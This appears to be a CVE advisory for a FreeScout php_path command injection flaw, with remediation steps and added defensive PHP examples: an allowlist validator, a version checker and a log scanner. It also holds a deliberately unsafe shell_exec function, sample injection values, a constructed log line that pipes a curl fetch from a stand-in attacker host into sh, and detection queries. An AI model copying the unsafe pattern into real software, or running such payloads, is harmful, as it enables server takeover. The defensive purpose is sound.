CVE-2025-48390

CVSS 7.2 HIGH

📋 TL;DR

FreeScout versions before 1.8.178 contain a code injection vulnerability in the php_path parameter. An authenticated administrator can submit a value containing backticks that is passed to the shell, executing arbitrary system commands as the web server user and potentially leading to full server compromise. Exploitation requires an administrator account (or a hijacked administrator session), so the bug turns any administrator compromise into host compromise.

💻 Affected Systems

Products:
  • FreeScout
Versions: All versions prior to 1.8.178
Operating Systems: All platforms running PHP
Default Config Vulnerable: ⚠️ Yes
Notes: Requires administrator role access to exploit. Self-hosted instances only.

📦 What is this software?

FreeScout is a self-hosted, open-source help desk and shared mailbox application written in PHP on the Laravel framework. Its administrators configure system settings, including the path to the PHP binary, from the web interface.

⚠️ Risk & Real-World Impact

🔴 Worst Case

Full server compromise. Injected commands run as the web server user (typically www-data); combined with a local privilege escalation this becomes root/system access, data exfiltration, ransomware deployment, or complete system takeover.

🟠 Likely Case

Unauthorized command execution as the web server user, leading to theft of mailbox and customer data, installation of web shells or other backdoors, or lateral movement within the network.

🟢 If Mitigated

Limited impact when administrator accounts are restricted to trusted users and the server is segmented; an attacker who still obtains an administrator session gains command execution on that host and can expose the data it holds.

🌐 Internet-Facing: HIGH
🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires administrator credentials or a hijacked administrator session (phishing, credential reuse, session theft). Once authenticated, triggering the bug is trivial, so the security of the host reduces to the security of the administrator accounts.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.8.178

Vendor Advisory: https://github.com/freescout-help-desk/freescout/security/advisories/GHSA-5324-cw55-gwj5

Restart Required: No

Instructions:

1. Back up the FreeScout installation directory and database.
2. Obtain version 1.8.178 or later from the official repository (or use the project's documented update procedure).
3. Replace the application files with the new version, keeping your .env file and storage data.
4. Clear application caches (config, routes, views) so the old code is not served.
5. Confirm the new version number in the admin panel.

🔧 Temporary Workarounds

Input Sanitization (all platforms)

Validate the php_path value against an allowlist rather than stripping backticks: accept only an absolute path made of ordinary path characters (no backticks, $(), ;, |, &, whitespace or newlines) that resolves to an existing executable. A blocklist that removes backticks alone still lets $(...) and other shell metacharacters through.

Edit tools.php to apply this validation before the value reaches file_exists() or any command string. The local edit is overwritten by the next update, so treat it as a stopgap until 1.8.178 is installed.

Access Restriction (all platforms)

Temporarily restrict administrator access to trusted users only, and review which accounts currently hold the role.
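Added example (this editor's code, not FreeScout's or the advisory's) contrasting the unsafe pattern the advisory describes with an allowlist validator of the kind the workaround above calls for. Function names are this example's own, and the exact shape of FreeScout's original code is not reproduced here:

```php
<?php
// Added example, not FreeScout's code. The first function reproduces the
// dangerous pattern the advisory describes (an administrator-controlled
// php_path string reaching the shell); the others are an allowlist-based
// replacement. Function names are this example's own.

// UNSAFE: the request value is concatenated into a shell command line.
// A value such as "/usr/bin/php`id`" is handed to the shell, which
// evaluates the backticks before the binary is ever looked up.
function unsafePhpVersion(string $phpPath): string
{
    return (string) shell_exec($phpPath . ' -v 2>&1');
}

// Returns the canonical path if the value is acceptable, null otherwise.
function validatePhpPath(string $phpPath): ?string
{
    // Allowlist: absolute path built only from characters that occur in real
    // binary paths. Backticks, $(), ; | & and whitespace can never match.
    if (!preg_match('#\A/[A-Za-z0-9._/+-]+\z#', $phpPath)) {
        return null;
    }
    // Resolve symlinks and ".." and insist on an existing executable file.
    $real = realpath($phpPath);
    if ($real === false || !is_file($real) || !is_executable($real)) {
        return null;
    }
    // Require the binary to be named like a PHP interpreter (php, php8.2, ...).
    if (!preg_match('/\Aphp[0-9.]*\z/', basename($real))) {
        return null;
    }
    return $real;
}

// SAFE: validate first, then quote anyway as defence in depth.
function safePhpVersion(string $phpPath): string
{
    $real = validatePhpPath($phpPath);
    if ($real === null) {
        return 'rejected: php_path must be an absolute path to an existing PHP binary';
    }
    return (string) shell_exec(escapeshellarg($real) . ' -v 2>&1');
}

// Demonstration: the hostile value is rejected before any shell is involved,
// while a legitimate path (if present on this host) is accepted and quoted.
$hostile = '/usr/bin/php`id`';
var_dump(validatePhpPath($hostile));
echo safePhpVersion($hostile), "\n";
echo safePhpVersion('/usr/bin/php'), "\n";
```

The allowlist does the real work; escapeshellarg() is kept so that a future relaxation of the pattern does not silently reintroduce injection. Requiring the basename to look like a PHP interpreter stops an administrator from pointing the setting at an arbitrary executable on the host.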

🧯 If You Can't Patch

  • Immediately revoke administrator privileges from all non-essential users
  • Implement network segmentation to isolate FreeScout server from critical systems

🔍 How to Verify

Check if Vulnerable:

Check FreeScout version in admin panel or by examining version files. If version is below 1.8.178, system is vulnerable.

Check Version:

FreeScout stores its release number under the 'version' key of config/app.php (the standard Laravel config directory):

grep -n "'version'" /path/to/freescout/config/app.php

Verify Fix Applied:

Confirm the admin panel reports 1.8.178 or higher. On a non-production copy, submit a php_path value containing backticks and confirm the application rejects it and no command runs (for example, check that no shell child of the PHP worker appears in process auditing).
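Added example (not part of FreeScout) that automates the version check above so it can run from a cron job or fleet inventory. It assumes the release number sits as 'version' => '1.8.x' in config/app.php; the default install root is an assumption too, so pass your own path as the first argument:

```php
<?php
// Added example, not part of FreeScout. Assumes the installation keeps its
// release number as 'version' => '1.8.x' in config/app.php, the standard
// Laravel config location. The default root below is an assumption.
const FIXED_VERSION = '1.8.178';

// Reads the version string out of config/app.php without executing it, so the
// check works outside the Laravel bootstrap (env() and friends are not needed).
function installedVersion(string $root): ?string
{
    $config = @file_get_contents($root . '/config/app.php');
    if ($config === false) {
        return null;
    }
    if (!preg_match('/\'version\'\s*=>\s*\'([0-9][0-9.]*)\'/', $config, $m)) {
        return null;
    }
    return $m[1];
}

// version_compare treats 1.8.9 as older than 1.8.178; a plain string
// comparison would get that wrong.
function isVulnerable(string $version): bool
{
    return version_compare($version, FIXED_VERSION, '<');
}

$root = $argv[1] ?? '/var/www/html';
$version = installedVersion($root);
if ($version === null) {
    fwrite(STDERR, "Could not read 'version' from {$root}/config/app.php\n");
    exit(2);
}
if (isVulnerable($version)) {
    echo "FreeScout {$version}: VULNERABLE, upgrade to " . FIXED_VERSION . " or later\n";
    exit(1);
}
echo "FreeScout {$version}: patched\n";
exit(0);
```

Exit status 1 means vulnerable, 2 means the version could not be determined, so the script slots into a monitoring check without parsing its output.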

📡 Detection & Monitoring

Log Indicators:

  • Changes to the php_path setting by administrator accounts, especially outside change windows or from unfamiliar source addresses
  • php_path values containing backticks, $(), ;, | or their URL-encoded forms (%60, %24%28) in any log that records request bodies (WAF, reverse proxy with body logging); standard access logs record only the URL, so a POST body will not appear there
  • Shell processes (sh, bash) spawned by the PHP worker (php-fpm or the web server user), visible through auditd, execsnoop or EDR process-creation telemetry

Network Indicators:

  • Unusual outbound connections from FreeScout server
  • Suspicious file transfers

SIEM Query:

source="freescout_logs" AND (php_path CONTAINS "`" OR php_path CONTAINS "$(" OR php_path CONTAINS "%60" OR php_path CONTAINS "%24%28")

Pair it with a process-creation rule on the host, since the request body may never be logged:

source="auditd" AND parent_process IN ("php-fpm", "php") AND process IN ("sh", "bash", "dash")
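Added example (not part of FreeScout) implementing the log indicator above over constructed sample lines. It assumes a reverse proxy or WAF in front of FreeScout writes the URL-encoded POST body of requests to the settings endpoint into its log; the /system/tools path and the line layout are assumptions, and the sample lines are constructed, not captured traffic:

```php
<?php
// Added example, not part of FreeScout. Scans request-body logs for php_path
// values that carry shell metacharacters. Assumes a proxy or WAF logs the
// URL-encoded POST body; plain web-server access logs do not contain bodies.
// The endpoint path and log layout below are assumptions.

// Any of these lets a value break out of a command line.
const SHELL_META = '/[`$;|&<>\n\r]/';

// Returns [line_number => decoded php_path] for every suspicious line.
function findSuspiciousPhpPath(array $lines): array
{
    $hits = [];
    foreach ($lines as $i => $line) {
        // Pull the php_path field out of a URL-encoded body.
        if (!preg_match('/(?:^|[?&\s"])php_path=([^&\s"]*)/', $line, $m)) {
            continue;
        }
        // Decode twice: double-encoding is a common way to slip past naive
        // filters. A benign value is unaffected by the second pass.
        $value = urldecode(urldecode($m[1]));
        if (preg_match(SHELL_META, $value)) {
            $hits[$i + 1] = $value;
        }
    }
    return $hits;
}

// Constructed sample log lines (not real traffic): one benign, one with an
// encoded backtick, one with a raw backtick and pipe, one double-encoded $(...).
$sample = [
    '10.0.0.5 POST /system/tools body="php_path=%2Fusr%2Fbin%2Fphp&action=save"',
    '10.0.0.9 POST /system/tools body="php_path=%2Fusr%2Fbin%2Fphp%60id%60&action=save"',
    '10.0.0.9 POST /system/tools body="php_path=/usr/bin/php`curl+evil.example%2Fx|sh`"',
    '10.0.0.9 POST /system/tools body="php_path=%252Fusr%252Fbin%252Fphp%2524%2528id%2529"',
];

foreach (findSuspiciousPhpPath($sample) as $lineNo => $value) {
    printf("line %d: suspicious php_path %s\n", $lineNo, $value);
}
```

The first sample line is not reported; the other three are. Matching after decoding is what catches the %60 and %2524%2528 variants that a query on the raw backtick character misses.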

🔗 References

  • Vendor advisory: https://github.com/freescout-help-desk/freescout/security/advisories/GHSA-5324-cw55-gwj5
  • NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2025-48390